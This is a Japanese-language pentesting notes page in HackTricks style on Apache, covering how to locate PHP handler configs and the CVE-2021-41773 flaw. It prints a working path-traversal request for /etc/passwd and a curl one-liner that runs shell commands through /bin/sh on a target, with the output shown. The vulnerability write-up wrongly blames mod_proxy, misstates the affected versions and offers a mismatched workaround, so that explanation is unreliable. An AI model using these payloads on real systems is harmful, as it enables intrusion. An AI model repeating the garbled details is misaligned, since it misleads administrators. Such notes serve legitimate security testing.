5.9 KiB
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
-
サイバーセキュリティ企業で働いていますか? HackTricksで会社を宣伝したいですか?または、最新バージョンのPEASSを入手したり、HackTricksをPDFでダウンロードしたいですか?SUBSCRIPTION PLANSをチェックしてください!
-
The PEASS Familyを見つけてください。独占的なNFTのコレクションです。
-
公式のPEASS&HackTricksのグッズを手に入れましょう。
-
💬 Discordグループまたはtelegramグループに参加するか、Twitterでフォローしてください🐦@carlospolopm。
-
**ハッキングのトリックを共有するには、hacktricksリポジトリとhacktricks-cloudリポジトリ**にPRを提出してください。
実行可能なPHP拡張機能
Apacheサーバーで実行されている拡張機能を確認します。これらを検索するには、次のコマンドを実行します:
grep -R -B1 "httpd-php" /etc/apache2
また、この設定を見つけることができる場所は以下の通りです:
/etc/apache2/mods-available/php5.conf
/etc/apache2/mods-enabled/php5.conf
/etc/apache2/mods-available/php7.3.conf
/etc/apache2/mods-enabled/php7.3.conf
CVE-2021-41773
概要
CVE-2021-41773は、Apache HTTP Serverの脆弱性であり、攻撃者がリモートで任意のファイルを読み取ることができる可能性があります。
影響を受けるバージョン
- Apache HTTP Server 2.4.49以前
詳細
この脆弱性は、Apache HTTP Serverのmod_proxyモジュールに存在します。攻撃者は、特定の条件下でリクエストを送信することで、目的のファイルの内容を読み取ることができます。
攻撃者は、以下のようなリクエストを送信することで、ファイルの読み取りを行うことができます。
GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1
Host: example.com
この脆弱性を悪用すると、攻撃者はサーバー上の任意のファイルにアクセスできる可能性があります。これにより、機密情報の漏洩やシステムへの不正アクセスが可能となります。
対策方法
Apache HTTP Serverのバージョン2.4.50以降にアップグレードすることを強くお勧めします。また、アップグレードができない場合は、以下のワークアラウンドを適用することができます。
- Apache HTTP Serverの設定ファイル(httpd.conf)に以下の行を追加します。
<Directory "/">
Require all denied
</Directory>
- mod_proxyモジュールを無効にします。
ProxyRequests Off
これにより、攻撃者はリモートでのファイルの読み取りを防ぐことができます。
参考情報
curl http://172.18.0.15/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/bin/sh --data 'echo Content-Type: text/plain; echo; id; uname'
uid=1(daemon) gid=1(daemon) groups=1(daemon)
Linux
☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥
-
サイバーセキュリティ会社で働いていますか? HackTricksで会社を宣伝したいですか?または、PEASSの最新バージョンにアクセスしたり、HackTricksをPDFでダウンロードしたいですか?SUBSCRIPTION PLANSをチェックしてください!
-
The PEASS Familyを見つけてください。独占的なNFTのコレクションです。
-
公式のPEASS&HackTricksのグッズを手に入れましょう。
-
💬 DiscordグループまたはTelegramグループに参加するか、Twitterでフォローしてください🐦@carlospolopm.
-
**ハッキングのトリックを共有するには、hacktricksリポジトリとhacktricks-cloudリポジトリ**にPRを提出してください。